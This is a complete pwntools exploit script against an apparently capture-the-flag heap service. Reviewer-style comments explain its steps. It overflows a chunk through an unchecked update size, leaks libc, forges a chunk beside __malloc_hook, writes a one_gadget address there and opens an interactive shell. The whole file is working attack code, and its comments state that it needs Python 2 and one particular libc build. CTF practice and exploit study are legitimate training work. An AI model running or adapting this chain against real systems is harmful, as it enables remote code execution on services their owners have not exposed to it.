from pwn import *

# Remote target and the local libc used to resolve symbols; both are hard-coded.
p = remote("8sdafgh.gamectf.com", 10001)
context.log_level = "debug"
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")


def free(index):
    """Select menu option 3 ("delete") on the service and answer with `index`."""
    menu_prompt = '5.Exit\n'
    which_prompt = 'Which one do you want to delete?'
    p.sendlineafter(menu_prompt, "3")
    p.sendlineafter(which_prompt, str(index))
def create(typd, content):
    """Select menu option 1 ("create"), pick size class `typd`, then send `content` raw.

    `content` is sent with sendafter (no trailing newline is appended), so callers
    supply their own line ending when the service expects one.
    """
    size_choice = str(typd)
    p.sendlineafter('5.Exit\n', "1")
    p.sendlineafter('3.Large\n', size_choice)
    p.sendafter("Input Content:", content)
def edit(index, size, content):
    """Select menu option 2 ("update") for chunk `index`.

    `size` is sent as the answer to the "Where you want to update?" prompt
    (the parameter name is the script author's; the prompt wording suggests an
    offset or length -- confirm against the service). `content` is sent raw
    after the "Input Content:" prompt, without an added newline.
    """
    menu_prompt = '5.Exit\n'
    p.sendlineafter(menu_prompt, "2")
    p.sendlineafter('Which one do you want to update?\n', str(index))
    p.sendlineafter("Where you want to update?\n", str(size))
    p.sendafter('Input Content:\n', content)


def show(index):
    """Select menu option 4 ("view") and answer with `index`; the reply is left in the socket buffer for the caller."""
    menu_prompt = '5.Exit\n'
    p.sendlineafter(menu_prompt, "4")
    p.sendlineafter('Which one do you want to view?', str(index))
# Exploit driver for the remote heap challenge connected to above.  The call
# sequence is order-sensitive: every create/free/edit changes the service's
# allocator state, so these statements must not be reordered.
# NOTE(review): the str/bytes mixing below (p64(...) + '\n', ljust(8, '\x00')
# on received data) only works with Python 2 pwntools; under Python 3 these
# lines raise TypeError.
create(2,'A\n')
create(2,'A\n')
create(2,'A\n')
create(2,'A\n')
create(1,'A\n')
create(1,'A\n')
# The size argument 0x80000000 is far beyond any plausible buffer.  The
# service presumably does not bound this update, which is the defect the rest
# of the script depends on; the service-side fix is a length check in its
# update handler.
edit(1,0x80000000,'A'*0x18+p64(0xf1)+'\n')
free(1)
create(2,'A\n')
show(2)
# Discard 6 bytes of the view output, then read a 6-byte value and widen it
# to 8 bytes.  The -0x10-88 adjustment relative to __malloc_hook is a
# build-specific constant: it is only meaningful if the local libc.so.6
# loaded above is the same build the remote service runs.
p.recv(6)
libc_base=u64(p.recv(6).ljust(8,'\x00'))-libc.symbols["__malloc_hook"]-0x10-88
success("libc_base====>0x%x"%libc_base)
pause()  # blocks until the operator presses a key
create(2,'A\n')
create(3,'A\n')
fake_chunk_addr = libc_base+libc.symbols["__malloc_hook"]+0x10+0x10
free(2)
edit(7,0,p64(0x51)+'\n')
create(2,'A\n')
# Dunder-style local name; it is just the resolved address of libc's
# __malloc_hook symbol for this run.
__malloc_hook = libc_base+libc.symbols["__malloc_hook"]
free(8)
edit(3,0,p64(fake_chunk_addr)+'\n')
create(3,'A\n')
create(3,'\x00'*0x38+p64(__malloc_hook-0x10))
free(9)
edit(7,0,p64(0)+'\n')
create(2,'A\n')
# Hard-coded offsets; like the leak adjustment above they are tied to one
# specific libc build.  Only index 3 is used here.
one_offset = [0x45216,0x4526a,0xf02a4,0xf1147]
one = libc_base+one_offset[3]
create(3,p64(one)+'\n')
# One more allocation driven through the menu directly, then the session is
# handed to the operator.
p.sendlineafter('5.Exit\n',"1")
p.sendlineafter("3.Large\n",str(1))
p.interactive()